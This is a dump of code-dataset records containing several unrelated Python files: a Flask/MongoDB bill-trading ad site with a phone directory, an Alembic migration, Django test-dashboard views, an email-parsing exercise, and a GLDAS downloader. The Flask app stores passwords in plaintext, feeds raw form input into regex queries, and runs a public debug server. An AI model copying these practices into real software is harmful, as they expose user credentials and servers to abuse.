cundan_df.loc[i,'计划发行(亿)']='wu' \n\n \n if faxing=='计划发行':\n cundan_df=cundan_df[(cundan_df['计划发行(亿)']!='')]\n cundan_df= cundan_df.sort_values(by=['发行日'], ascending=False)\n cundan_df= cundan_df.to_html(index=False)\n\n return render_template('cundan.html',cundan_df=cundan_df)\n\n elif faxing=='实际发行':\n cundan_df=cundan_df[(cundan_df['实际发行(亿)']!='')]\n cundan_df= cundan_df.sort_values(by=['发行日'], ascending=False)\n cundan_df= cundan_df.to_html(index=False)\n\n return render_template('cundan.html',cundan_df=cundan_df)\n\n \n cundan_df= cundan_df.sort_values(by=['发行日','爬取日期'], ascending=True)\n # cundan_df.drop_duplicates('发行日', keep='last') #删除重复广告\n \n\n cundan_df= cundan_df.to_html(index=False)\n\n return render_template('cundan.html',cundan_df=cundan_df)\n\n\n\n\n\n\n\n\n\n@app.route('/zijin',methods=['POST','GET'])\ndef image_zijin():\n return render_template('zijin.html')\n\n\n@app.route('/image',methods=['POST','GET'])\n#@auth.login_required\n\ndef image():\n h3=['票据数据展示']\n h4=['票据数据展示']\n # h5='会员操作,暂未开通'\n image_shun=[] #表格的顺序,用list来控制。因为js里面的for in 是没发控制显示顺序\n piaofenxi0=pd.DataFrame({'机构':[], #\n '收票':[], #\n '出票':[],#\n '收代持':[],#\n '出代持':[],\n '统计日期':[],\n '时间':[]\n }) #\n shou=''\n chu=''\n shouchubi=''\n\n if request.method == 'POST':\n if request.form['Submit']=='数据刷新':\n\n value2= request.form.getlist('demo-checkbox')\n\n shijian=time.strftime('%H:%M',time.localtime(time.time()))\n\n shijian2=time.strftime('%Y-%m-%d',time.localtime(time.time()))\n shijian2 = datetime.datetime.strptime(shijian2, \"%Y-%m-%d\")\n\n shijian3=shijian2-datetime.timedelta(days=1)\n shijian4=shijian2-datetime.timedelta(days=2)\n shijian5=shijian2-datetime.timedelta(days=14)\n\n shijian2=str(shijian2.strftime(\"%Y-%m-%d\"))\n\n shijian3=str(shijian3.strftime(\"%Y-%m-%d\"))\n shijian4=str(shijian4.strftime(\"%Y-%m-%d\"))\n shijian5=str(shijian5.strftime(\"%Y-%m-%d\"))\n\n cursor = collection5.find({\"$and\":[{'time':str(shijian2)}]})\n present_time = pd.DataFrame(list(cursor))\n if present_time.empty:\n cursor = collection5.find({\"$and\":[{'time':str(shijian3)}]})\n present_time = pd.DataFrame(list(cursor))\n shijian2=shijian3\n shijian='日终'\n if present_time.empty:\n cursor = collection5.find({\"$and\":[{'time':str(shijian4)}]})\n present_time = pd.DataFrame(list(cursor))\n shijian2=shijian4\n shijian='日终'\n\n\t\t\t\t\t\t\t\t\n \n huatudata3=present_time[['hanglei1','hanglei2','shou','chu','shoudai','chudai']]\n huatudata4=huatudata3.groupby(['hanglei1']).sum()\n huatudata5=huatudata3.groupby(['hanglei2']).sum()\n shou=huatudata5.ix[1,'shou']\n chu=huatudata5.ix[1,'chu']\n shouchubi=round((shou/chu+0.0001),2)\n if shijian>'17:30':\n shijian='日终'\n\n huatudata4['统计日期']=shijian2\n huatudata4['时间']=shijian\n\n huatudata4=huatudata4.reset_index(drop = False)\n huatudata4.rename(columns={'hanglei1':'机构','shou':'收票','chu':'出票','shoudai':'收代持','chudai':'出代持'}, inplace=True)\n huatudata4=huatudata4[['机构','收票','出票','收代持','出代持','统计日期','时间']]\n huatudata5=huatudata4\n huatudata5['时间加']=huatudata5['统计日期']+' '+huatudata5['机构']\n huatudata5=huatudata5[['时间加','收票','出票','收代持','出代持','时间']]\t\t\t \n # h3 = huatudata4.to_html(index=False)\n collection6.remove({'统计日期':str(shijian2)}) #删除早于该时间点的数据\n records = json.loads(huatudata4.T.to_json()).values()\n collection6.insert(records) \n \n if len(value2)==0:\n cursor = collection6.find({'统计日期':{'$gte':str(shijian5)}})\n\n piaofenxi = pd.DataFrame(list(cursor))\n piaofenxi0=piaofenxi[['机构','收票','出票','收代持','出代持','统计日期','时间']]\n piaofenxi0['时间加']=piaofenxi0['统计日期']+' '+piaofenxi0['机构']\n piaofenxi0=piaofenxi0[['时间加','收票','出票','收代持','出代持','时间']] \n # h4 = piaofenxi.to_html(index=False)\n print(piaofenxi0)\n else:\n \n for i in range(0,len(value2)):\n cursor = collection6.find({\"$and\":[{'统计日期':{'$gte':str(shijian5)}},{'机构':value2[i]}]})\n piaofenxi1=pd.DataFrame(list(cursor))\n piaofenxi0=pd.concat([piaofenxi1,piaofenxi0])\n piaofenxi0=piaofenxi0[['机构','收票','出票','收代持','出代持','统计日期','时间']]\n piaofenxi0['收票']=piaofenxi0['收票'].astype('int')\n piaofenxi0['出票']=piaofenxi0['出票'].astype('int')\n piaofenxi0['收代持']=piaofenxi0['收代持'].astype('int')\n piaofenxi0['出代持']=piaofenxi0['出代持'].astype('int')\n piaofenxi0['时间加']=piaofenxi0['统计日期']+' '+piaofenxi0['机构']\n piaofenxi0=piaofenxi0[['时间加','收票','出票','收代持','出代持','时间']]\n\n # h4 = piaofenxi0.to_html(index=False)\n#\n image_shun=piaofenxi0['时间加'].tolist()\n \n h4=piaofenxi0.set_index('时间加').T.to_dict('list')\n h3=huatudata5.set_index('时间加').T.to_dict('list')\n\n\n return render_template('image.html',entries=json.dumps(h3),entries2=json.dumps(h4),image_shun=json.dumps(image_shun),shou=shou,chu=chu,shouchubi=shouchubi)\n\n \n\n@app.route('/us',methods=['POST','GET'])\ndef us():\n\n return render_template('us.html')\n\n#\n\n@app.route('/', methods=['POST','GET'])\n@app.route('/home',methods=['POST','GET'])\n\ndef home():\n global collection13,collection5\n shengfen='不限'\n haoji='不限'\n jigou='不限'\n yewuu0='未选'\n yewuu=''\n yinlei='不限'\n name=''\n h2='会员广告展示区域。'\n zong=['']\n zong_shun=[]\n h3=['群友电话号码仅是了业务沟通而公开,随查随用,不提供下载。号码是从交易云账户或者公开广告中获取,如本人觉得不妥,请告知删除~']\n h1='即时广告:'\n h33=''\n shijian11=time.strftime('%y-%m-%d',time.localtime(time.time()))\n shijian11 = datetime.datetime.strptime(shijian11, \"%y-%m-%d\")\n shijian02=shijian11-datetime.timedelta(days=3)\n\n shijian11=shijian11.strftime(\"%Y-%m-%d\") #今天\n shijian02=shijian02.strftime(\"%Y-%m-%d\") #大前天\n\n cursor10 = collection10.find({\"$and\":[{'发送日期':str(shijian11)}]})\n number_df = pd.DataFrame(list(cursor10))\n if number_df.empty:\n sousuoci=0\n else:\n sousuoci=len(number_df)\n \n\n h=['广告展示区域。请点击按钮刷新广告!']\n if request.method == 'POST': #点击登录时\n if request.form['Submit']=='查询':\n jigou=request.form['good3']\n yewuu=request.form['good']\n yewuu0=yewuu.replace('chufu','出证').replace('shoufu','收证').replace('chuli','出理财').replace('shouli','收理财').replace('chucun','出存单').replace('shoucun','收存单').replace('shou','收票').replace('chu','出票')\n jigou=jigou.replace('0','中介').replace('1','国有行').replace('2','股份行1').replace('3','股份行2').replace('4','城商行').replace('5','农商行')\n \n\n\n \n if jigou=='不限':\n shijian_t=time.strftime('%H:%M',time.localtime(time.time())) #\n\n data=pd.DataFrame({'登录日期':[shijian11], #\n '点击时间':[shijian_t], #\n '用户名':[tt],#\n '业务方向':[yewuu]\n }) #\n records = json.loads(data.T.to_json()).values() \n collection.insert(records) #\n cursor5 = collection5.find({\"$and\":[\n {'time':{'$gte':shijian02}},\n {yewuu:1},\n # {'hanglei2':1},\n ]})\n piaofen_df = pd.DataFrame(list(cursor5))\n\n h1='广告查询:'\n cursor2 = collection2.find({\"$and\":[{'业务':{yewuu:1}},{'发送日期':{'$gte':shijian02}}]})\n huiguang_df = pd.DataFrame(list(cursor2))\n#\n elif jigou=='所有银行':\n shijian_t=time.strftime('%H:%M',time.localtime(time.time())) #\n\n data=pd.DataFrame({'登录日期':[shijian11], #\n '点击时间':[shijian_t], #\n '用户名':[tt],#\n '业务方向':[yewuu]#\n }) #\n records = json.loads(data.T.to_json()).values() #\n collection.insert(records) #\n cursor5 = collection5.find({\"$and\":[\n {'time':{'$gte':shijian02}},\n {yewuu:1},\n {'hanglei2':1},\n ]})\n piaofen_df = pd.DataFrame(list(cursor5))\n\n h1='广告查询:'\n cursor2 = collection2.find({\"$and\":[{'业务':{yewuu:1}},{'发送日期':{'$gte':shijian02}}]})\n huiguang_df = pd.DataFrame(list(cursor2))\n\n elif jigou=='非银行':\n shijian_t=time.strftime('%H:%M',time.localtime(time.time())) #\n\n data=pd.DataFrame({'登录日期':[shijian11], #\n '点击时间':[shijian_t], #\n '用户名':[tt],#\n '业务方向':[yewuu]#\n }) #\n records = json.loads(data.T.to_json()).values() #\n collection.insert(records) #\n cursor5 = collection5.find({\"$and\":[\n {'time':{'$gte':shijian02}},\n {yewuu:1},\n {'hanglei2':jigou},\n ]})\n piaofen_df = pd.DataFrame(list(cursor5))\n\n h1='广告查询:'\n cursor2 = collection2.find({\"$and\":[{'业务':{yewuu:1}},{'发送日期':{'$gte':shijian02}}]})\n huiguang_df = pd.DataFrame(list(cursor2))\n\n else:\n shijian_t=time.strftime('%H:%M',time.localtime(time.time())) #\n\n data=pd.DataFrame({'登录日期':[shijian11], #\n '点击时间':[shijian_t], #\n '用户名':[tt],#\n '业务方向':[yewuu]#\n }) #\n records = json.loads(data.T.to_json()).values() #\n collection.insert(records) #\n cursor5 = collection5.find({\"$and\":[\n {'time':{'$gte':shijian02}},\n {yewuu:1},\n {'hanglei3':0},\n ]})\n piaofen_df = pd.DataFrame(list(cursor5))\n\n h1='广告查询:'\n cursor2 = collection2.find({\"$and\":[{'业务':{yewuu:1}},{'发送日期':{'$gte':shijian02}}]})\n huiguang_df = pd.DataFrame(list(cursor2))\n#搜索通讯录\n\n if piaofen_df.empty:\n\n if huiguang_df.empty:\n zong=['暂无当日广告。']\n\n else:\n huiguang_df=huiguang_df[['发送日期','发送时间','机构','用户','业务','备注','用户名']]\n huiguang_df=huiguang_df.drop_duplicates('用户名',keep='last') #删除重复广告\n\n huiguang_df['昵称']=huiguang_df['机构']+huiguang_df['用户']+huiguang_df['用户名']\n huiguang_df['内容']=huiguang_df['业务'].astype('str')+' 。'+huiguang_df['备注']\n huiguang_df['行类']='会员机构'\n huiguang_df['内容'] = huiguang_df['内容'].astype('str')\n\n huiguang_df=huiguang_df[['发送日期','发送时间','昵称','行类','内容']]\n zong_df= huiguang_df.sort_values(by=['发送日期','发送时间'], ascending=False)\n \n\n zong_df['时间']=zong_df['发送日期']+' '+zong_df['发送时间']\n for i in range(0,len(zong_df)):\n zong_df.loc[i,'顺序']=i+1\n zong_df['顺序'] = zong_df['顺序'].astype('str')\n\n\n\n\n \n zong_shun=zong_df['顺序'].tolist()\n zong_df=zong_df[['顺序','时间','昵称','行类','内容']]\n zong=zong_df.set_index('顺序').T.to_dict('list')\n\n\n\n \n else:\n piaofen_df=piaofen_df[['time','time2','nickname','hanglei1','content']]\n piaofen_df.drop_duplicates('content', keep='last') #删除重复广告\n piaofen_df= piaofen_df.sort_values(by=['time','time2'], ascending=False)\n piaofen_df = piaofen_df.reset_index(drop=True) \n a=len(piaofen_df)\n len0=min(a,100)\n piaofen_df.drop(0)\n result=piaofen_df[0:len0]\n pd.set_option('max_colwidth', 500) #让dataframe全部显示全\n result.rename(columns={'time':'发送日期','time2':'发送时间','nickname':'昵称','hanglei1':'行类','content':'内容'}, inplace=True)\n result= result.sort_values(by=['发送日期','发送时间'], ascending=False)\n print(result.head())\n if huiguang_df.empty:\n zong_df=result\n\n else:\n huiguang_df=huiguang_df[['发送日期','发送时间','机构','用户','业务','备注','用户名']]\n huiguang_df=huiguang_df.drop_duplicates('用户名',keep='last') #删除重复广告\n\n huiguang_df['昵称']=huiguang_df['机构']+huiguang_df['用户']+huiguang_df['用户名']\n huiguang_df['内容']=huiguang_df['业务'].astype('str')+' 。'+huiguang_df['备注']\n huiguang_df['行类']='会员机构'\n huiguang_df['内容'] = huiguang_df['内容'].astype('str')\n\n huiguang_df=huiguang_df[['发送日期','发送时间','昵称','行类','内容']]\n huiguang_df= huiguang_df.sort_values(by=['发送日期','发送时间'], ascending=False)\n zong_df=pd.concat([huiguang_df,result])\n print(zong_df)\n\n zong_df=zong_df.reset_index(drop = True)\n\n zong_df['时间']=zong_df['发送日期']+' '+zong_df['发送时间']\n for i in range(0,len(zong_df)):\n zong_df.loc[i,'顺序']=i+1\n zong_df['顺序'] = zong_df['顺序'].astype('str')\n zong_shun=zong_df['顺序'].tolist()\n\n zong_df=zong_df[['顺序','时间','昵称','行类','内容']]\n zong=zong_df.set_index('顺序').T.to_dict('list')\n\n\n\n\n\n else:\n\n shijian_t=time.strftime('%H:%M',time.localtime(time.time())) #\n shengfen=request.form['good3']\n yinlei=request.form['good']\n if shengfen=='不限' and yinlei=='不限' and request.form['姓名']=='':\n\n h3=['请在省份、银行分类、昵称中至少填入一项已知信息。']\n else:\n\n\n if shengfen=='不限' and yinlei!='不限' and request.form['姓名']!='':\n \n cursor13 = collection13.find({ \"$and\":[{'银行分类':yinlei},{'姓名':{'$regex':request.form['姓名']}}]}) \n\n\n\n if shengfen!='不限' and yinlei=='不限' and request.form['姓名']!='':\n\n cursor13 = collection13.find({ \"$and\":[{'省份':shengfen},{'姓名':{'$regex':request.form['姓名']}}]}) \n\n if shengfen!='不限' and yinlei!='不限' and request.form['姓名']=='': ######\n \n cursor13 = collection13.find({ \"$and\":[{'省份':shengfen},{'银行分类':yinlei}]}) \n\n if shengfen=='不限' and yinlei=='不限' and request.form['姓名']!='':\n \n cursor13 = collection13.find({'姓名':{'$regex':request.form['姓名']}}) \n\n if shengfen=='不限' and yinlei!='不限' and request.form['姓名']=='':\n \n cursor13 = collection13.find({'银行分类':yinlei}) \n\n if shengfen!='不限' and yinlei=='不限' and request.form['姓名']=='':\n \n cursor13= collection13.find({'省份':shengfen})\n\n\n \n number_df = pd.DataFrame(list(cursor13))\n \n if number_df.empty:\n h3=['未找到联系方式。']\n\n else:\n number_df=number_df[:min(len(number_df),2)]\n number_df=number_df[['省份','银行分类','姓名','电话','票据业务','福费廷业务','存单业务','理财业务']]\n h3=number_df.set_index('电话').T.to_dict('list')\n data=pd.DataFrame({'发送日期':[shijian11], #\n '发送时间':[shijian_t], #\n '用户名':[tt],#\n '省份':[shengfen],#\n '银行分类':[yinlei],\n '昵称':[request.form['姓名']]\n }) #\n records = json.loads(data.T.to_json()).values() #\n collection4.insert(records) #\n\n\n \n\n \n\n\n\n\n\n\n \n\n cursor = collection.find({'登录日期':shijian11})\n jishi_df = pd.DataFrame(list(cursor))\n if jishi_df.empty :\n chu=0\n shou=0\n \n else:\n jishiz=jishi_df.groupby(['业务方向']).size()\n jishiz=jishiz.reset_index(drop = False)\n\n jishiz=jishiz[(jishiz['业务方向']=='chu') |(jishiz['业务方向']=='shou')]\n\n jishiz=jishiz.reset_index(drop = False)\n\n if len(jishiz)<2:\n chu=0\n shou=0\n else:\n chu=jishiz.loc[0,0]\n shou=jishiz.loc[1,0]\n return render_template('home.html',jigou=jigou,yewu0=yewuu0,haosheng=shengfen,haoji=yinlei,zong_json =json.dumps(zong),h1=h1,chu=chu,shou=shou,sousuoci=sousuoci,result_json =json.dumps(h3),zong_shun=json.dumps(zong_shun))\n\n\n\n\n\n@app.route('/regist1', methods=['POST','GET'])\ndef regist1():\n return render_template('regist1.html', username=request.args.get('username'))\n\n\n\n\n@app.route('/regist', methods=['POST','GET'])\ndef regist():\n shijian11=time.strftime('%y-%m-%d',time.localtime(time.time()))\n shijian11 = datetime.datetime.strptime(shijian11, \"%y-%m-%d\")\n shijian11=shijian11.strftime(\"%Y-%m-%d\") #今天\n\n \n if request.method == 'POST': #点击注册时\n if (request.form['username']!='') and request.form['jigou']!='' and request.form['password']!='' :\n\n data=pd.DataFrame({'用户名':[request.form['username']], \n '发送时间':[shijian11], #\n '机构':[request.form['jigou']],#\n '密码':[request.form['password']]\n }) \n records = json.loads(data.T.to_json()).values() \n collection3.insert(records) \n return redirect(url_for('regist1')) \n return render_template('regist.html')\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'),404\n\n@app.errorhandler(500)\ndef page_not_found(e):\n return render_template('500.html'),500\n\n\n#\n\n\n\n\nif __name__==\"__main__\":\n #app.run(host='0.0.0.0',port=443, ssl_context=('1531224955617.pem', '1531224955617.key'),debug=True,threaded=True)\n app.run(host='0.0.0.0',port=80,debug=True,threaded=True)\n","sub_path":"jinwang23.py","file_name":"jinwang23.py","file_ext":"py","file_size_in_byte":40434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"101800593","text":"\"\"\"Label new update\n\nRevision ID: ed117c4918a6\nRevises: \nCreate Date: 2017-11-04 03:35:54.647403\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ed117c4918a6'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('labels',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('classifications',\n sa.Column('blog_id', sa.Integer(), nullable=True),\n sa.Column('label_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['blog_id'], ['blogs.id'], ),\n sa.ForeignKeyConstraint(['label_id'], ['labels.id'], )\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('classifications')\n op.drop_table('labels')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/ed117c4918a6_label_new_update.py","file_name":"ed117c4918a6_label_new_update.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"386938822","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.views.generic import View\nfrom django.contrib.auth.models import User\nfrom testApp import models\n\n\nclass HomePageView(View):\n template_name = 'dashboard/HomePage.html'\n\n def get(self, request):\n user_object = User.objects.get(username=request.user)\n test_status_string = None\n testbatch = None\n if user_object.is_staff:\n all_tests = models.TestTable.objects.all()\n test_status_string = self.check_status(all_tests)\n is_admin = True\n else:\n batch_object = models.UserExtensionTable.objects.filter(Student=user_object)\n testbatch = []\n for batch in batch_object:\n testbatch_1 = models.TestBatchJunction.objects.filter(Batch=batch.Batch, Test__Test_Ready=True)\n for tb in testbatch_1:\n if not models.UserTestJunction.objects.filter(Test=tb.Test, Student=user_object):\n testbatch.append(tb)\n is_admin = False\n return render(request, self.template_name, {\n 'testbatch': testbatch,\n 'is_admin': is_admin,\n 'test_status_string': test_status_string\n })\n\n def post(self, request):\n return HomePageView.get(self, request)\n\n def check_status(self, all_tests):\n test_status_string = [] # (Test name , Status Description, Status )\n for test in all_tests:\n test_mini_string = []\n all_test_subjects = models.TestSubjectTable.objects.filter(Test=test)\n test_mini_string.append(test.Test_Name)\n status_fail = False\n status_string = ''\n has_data = False\n for ts in all_test_subjects:\n has_data =True\n required_count = ts.sub_wise_number_of_questions\n available_count = models.QuestionsTable.objects.filter(Subject=ts.Subject).count()\n status_string = status_string + ts.Subject.Subject_name + ' : ' + str(available_count) \\\n + '/' + str(required_count) + ' '\n if not required_count <= available_count:\n status_fail = True\n if not has_data:\n status_string = 'You havent added Subject wise Split Up'\n status_fail = True\n test_mini_string.append(status_string)\n if status_fail:\n test_mini_string.append('Test Not Ready')\n else:\n test_mini_string.append('Test Ready')\n test_status_string.append(test_mini_string)\n return test_status_string\n\n\nclass MyTestView(View):\n\n def get(self, request):\n user = User.objects.get(username=request.user)\n all_taken_tests = models.UserTestJunction.objects.filter(Student=user)\n print(all_taken_tests)\n return render(request, 'dashboard/mytests.html', {\n 'all_tests': all_taken_tests\n })\n\n\nclass TestQuestionsView(View):\n\n def get(self, request, test_id):\n test = models.TestTable.objects.get(id=test_id)\n user = User.objects.get(username=request.user)\n utj = models.UserTestJunction.objects.get(Student=user, Test=test)\n utqj = models.UserTestQuestionJunction.objects.filter(UserTest=utj)\n bookmarks = models.BookmarksTable.objects.filter(Student=user)\n bookmark_list = []\n for bookmark in bookmarks:\n bookmark_list.append(bookmark.bookmarked_question.id)\n total_time_spent = 0\n subject_wise_array = []\n for question in utqj:\n total_time_spent = total_time_spent + question.timetaken\n subject_list = set(utqj.values_list('question__Subject', flat=True))\n for sub_id in subject_list:\n subject = models.SubjectsTable.objects.get(id=sub_id)\n query = models.UserTestQuestionJunction.objects.filter(question__Subject=subject)\n total_number_of_subject_questions = query.count()\n correct_number_of_subject_questions = query.filter(result=1).count()\n incorrect_number_of_subject_questions = query.filter(result=3).count()\n positive_marks = correct_number_of_subject_questions*test.Positive_mark\n negative_marks = incorrect_number_of_subject_questions*test.Negative_mark\n subject_wise_array.append([subject.Subject_name,\n total_number_of_subject_questions,\n correct_number_of_subject_questions,\n incorrect_number_of_subject_questions,\n positive_marks,\n negative_marks,\n positive_marks-negative_marks\n ])\n # subject_wise_array.append([subject.Subject_name, subject])\n Total_marks = test.Number_of_Questions*test.Positive_mark\n no_of_correct_answer = utqj.filter(result=1).count()\n no_of_unanswered_answer = utqj.filter(result=2).count()\n no_of_wrong_answer = utqj.filter(result=3).count()\n obtained_marks = (no_of_correct_answer * test.Positive_mark) - (no_of_wrong_answer * test.Negative_mark)\n return render(request, 'dashboard/testquestions.html', {\n 'all_questions_utqj': utqj,\n 'test_id': test_id,\n 'bookmark_list': bookmark_list,\n 'Total_marks': Total_marks,\n 'Total_time': test.Time_allotted/60,\n 'Total_questions': test.Number_of_Questions,\n 'user_marks': obtained_marks,\n 'total_time_spent_min': int(total_time_spent/60),\n 'total_time_spent_sec': int(total_time_spent % 60),\n 'Total_correct': no_of_correct_answer,\n 'Total_incorrect': no_of_wrong_answer,\n 'Total_unanswered': no_of_unanswered_answer,\n 'percentage_scored': obtained_marks/Total_marks*100,\n 'subject_wise_array': subject_wise_array\n })\n\n\nclass AddBookmarkView(View):\n\n def get(self, request, test_id):\n user = User.objects.get(username=request.user)\n bookmark = models.BookmarksTable()\n bookmark.Student = user\n question = models.QuestionsTable.objects.get(id=int(request.GET['question_id']))\n bookmark.bookmarked_question = question\n try:\n bookmark.doubt_description = self.request.GET['doubt_description']\n except Exception as e:\n bookmark.doubt_description = ''\n bookmark.save()\n return redirect('dashboard:testquestions', test_id)\n\n\nclass RemoveBookmarkView(View):\n\n def get(self, request, question_id):\n models.BookmarksTable.objects.get(id=question_id).delete()\n return redirect('dashboard:bookmarklist')\n\n\nclass BookMarkListView(View):\n\n def get(self, request):\n user = User.objects.get(username=request.user)\n Data_array = []\n bookmarks = models.BookmarksTable.objects.filter(Student=user)\n Data_array.append(['All Questions', bookmarks])\n subject_id_list = set(bookmarks.values_list('bookmarked_question__Subject__id', flat=True))\n for ids in subject_id_list:\n print('here')\n bookmarks_array = bookmarks.filter(bookmarked_question__Subject__id=ids)\n subject_name = bookmarks_array[0].bookmarked_question.Subject.Subject_name\n Data_array.append([subject_name, bookmarks_array])\n return render(request, 'dashboard/bookmarkslist.html', {\n 'Data_array': Data_array\n })\n\n\nclass ProfileView(View):\n\n def get(self, request):\n user = models.User.objects.get(username=request.user)\n batch_list = models.UserExtensionTable.objects.filter(Student=user)\n return render(request, 'dashboard/profile.html', {\n 'user': user,\n 'batch_list': batch_list\n })\n\n\nclass AboutUs(View):\n\n def get(self, request):\n return render(request, 'dashboard/aboutus.html')\n\n\nclass CustomAdmin(View):\n\n def get(self, request):\n student_list = models.User.objects.filter()\n batch_list = models.BatchTable.objects.filter()\n return render(request, 'dashboard/custom_admin.html', {\n 'student_list': student_list,\n 'batch_list': batch_list,\n 'msg': ''\n })\n\n def post(self, request):\n batch = models.BatchTable.objects.get(id=int(request.POST['batch']))\n for student_id in request.POST.getlist('student_list'):\n user = models.User.objects.get(id=int(student_id))\n models.UserExtensionTable(Student=user, Batch=batch).save()\n student_list = models.User.objects.filter()\n batch_list = models.BatchTable.objects.filter()\n return render(request, 'dashboard/custom_admin.html', {\n 'student_list': student_list,\n 'batch_list': batch_list,\n 'msg': 'successfully added!!'\n })\n","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"488998889","text":"#codng:utf-8\n\"\"\"\n控制台输入邮箱地址,程序识别用户名和公司名后将用户名和公司名输出到控制台\n要求:\n1、校验输入内容是否符合规范(xx@yy.com),如果是进入下一步,\n如果否则抛出提示\"incorrent email format\".邮箱必须以.com结尾\n2、可以循环\"输入--输出判断结果\"整个过程\n3、按字母Q不区分大小写退出循环结束程序\n\"\"\"\ndef main():\n while True:\n email = input(\"请输入您的邮箱,输入Q或q退出程序:\")\n if email == \"Q\" or email == \"q\":\n break\n if email.endswith(\".com\"):\n print(\"您的用户名是:\",email.split(\"@\")[0])\n print(\"您的公司名是:\",(email.split(\"@\")[1]).replace(\".com\",\"\"))\n else:\n print(\"incorrent email format\")\n\nif __name__ == \"__main__\":\n main()","sub_path":"demo05/day02_exc13.py","file_name":"day02_exc13.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"242480186","text":"\"\"\"\nModule managing download of NOAH GLDAS data.\n\"\"\"\n\nimport os\nimport sys\nimport glob\nimport argparse\nfrom functools import partial\n\nfrom trollsift.parser import validate, parse, globify\nfrom datetime import datetime\nfrom datedown.interface import mkdate\nfrom datedown.dates import daily\nfrom datedown.urlcreator import create_dt_url\nfrom datedown.fname_creator import create_dt_fpath\nfrom datedown.interface import download_by_dt\nfrom datedown.down import download\n\n\ndef gldas_folder_get_version_first_last(\n root, fmt=None, subpaths=[\"{time:%Y}\", \"{time:%j}\"]\n):\n \"\"\"\n Get product version and first and last product which exists under the root folder.\n\n Parameters\n ----------\n root: string\n Root folder on local filesystem\n fmt: string, optional\n Formatting string\n (default: \"GLDAS_NOAH025_3H.A{time:%Y%m%d.%H%M}.0{version:2s}.nc4\")\n subpaths: list, optional\n Format of the subdirectories under root (default: ['{:%Y}', '{:%j}']).\n\n Returns\n -------\n version: string\n Found product version\n start: datetime.datetime\n First found product datetime\n end: datetime.datetime\n Last found product datetime\n \"\"\"\n if fmt is None:\n fmt = \"GLDAS_NOAH025_3H{ep}.A{time:%Y%m%d.%H%M}.0{version:2s}.nc4\"\n\n start = None\n end = None\n version = None\n first_folder = get_first_gldas_folder(root, subpaths)\n last_folder = get_last_gldas_folder(root, subpaths)\n\n if first_folder is not None:\n files = sorted(glob.glob(os.path.join(first_folder, globify(fmt))))\n data = parse(fmt, os.path.split(files[0])[1])\n start = data[\"time\"]\n ep = data[\"ep\"]\n version = f\"GLDAS_Noah_v{data['version']}_025{data['ep']}\"\n\n if last_folder is not None:\n files = sorted(glob.glob(os.path.join(last_folder, globify(fmt))))\n data = parse(fmt, os.path.split(files[-1])[1])\n end = data[\"time\"]\n\n return version, start, end\n\n\ndef get_last_gldas_folder(root, subpaths):\n \"\"\"\n Get last GLDAS folder name.\n\n Parameters\n ----------\n root : str\n Root path.\n subpaths : list of str\n Subpath information.\n\n Returns\n -------\n directory : str\n Last folder name.\n \"\"\"\n directory = root\n for level, subpath in enumerate(subpaths):\n last_dir = get_last_formatted_dir_in_dir(directory, subpath)\n if last_dir is None:\n directory = None\n break\n directory = os.path.join(directory, last_dir)\n\n return directory\n\n\ndef get_first_gldas_folder(root, subpaths):\n \"\"\"\n Get first GLDAS folder name.\n\n Parameters\n ----------\n root : str\n Root path.\n subpaths : list of str\n Subpath information.\n\n Returns\n -------\n directory : str\n First folder name.\n \"\"\"\n directory = root\n for level, subpath in enumerate(subpaths):\n last_dir = get_first_formatted_dir_in_dir(directory, subpath)\n if last_dir is None:\n directory = None\n break\n directory = os.path.join(directory, last_dir)\n\n return directory\n\n\ndef get_last_formatted_dir_in_dir(folder, fmt):\n \"\"\"\n Get the (alphabetically) last directory in a directory\n which can be formatted according to fmt.\n\n Parameters\n ----------\n folder : str\n Folder name.\n fmt : str\n Format string.\n\n Returns\n -------\n last_elem : str\n Last formatted directory.\n \"\"\"\n last_elem = None\n root_elements = sorted(os.listdir(folder))\n for root_element in root_elements[::-1]:\n if os.path.isdir(os.path.join(folder, root_element)):\n if validate(fmt, root_element):\n last_elem = root_element\n break\n\n return last_elem\n\n\ndef get_first_formatted_dir_in_dir(folder, fmt):\n \"\"\"\n Get the (alphabetically) first directory in a directory\n which can be formatted according to fmt.\n\n Parameters\n ----------\n folder : str\n Folder name.\n fmt : str\n Format string.\n\n Returns\n -------\n first_elem : str\n First formatted directory.\n \"\"\"\n first_elem = None\n root_elements = sorted(os.listdir(folder))\n for root_element in root_elements:\n if os.path.isdir(os.path.join(folder, root_element)):\n if validate(fmt, root_element):\n first_elem = root_element\n break\n\n return first_elem\n\n\ndef get_gldas_start_date(product):\n \"\"\"\n Get NOAH GLDAS start date.\n\n Parameters\n ----------\n product : str\n Product name.\n\n Returns\n -------\n start_date : datetime\n Start date of NOAH GLDAS product.\n \"\"\"\n dt_dict = {\n \"GLDAS_Noah_v20_025\": datetime(1948, 1, 1, 3),\n \"GLDAS_Noah_v21_025\": datetime(2000, 1, 1, 3),\n \"GLDAS_Noah_v21_025_EP\": datetime(2000, 1, 1, 3),\n }\n\n return dt_dict[product]\n\n\ndef parse_args(args):\n \"\"\"\n Parse command line parameters for recursive download.\n\n Parameters\n ----------\n args : list of str\n Command line parameters as list of strings.\n\n Returns\n -------\n args : argparse.Namespace\n Command line arguments.\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"Download GLDAS data.\",\n 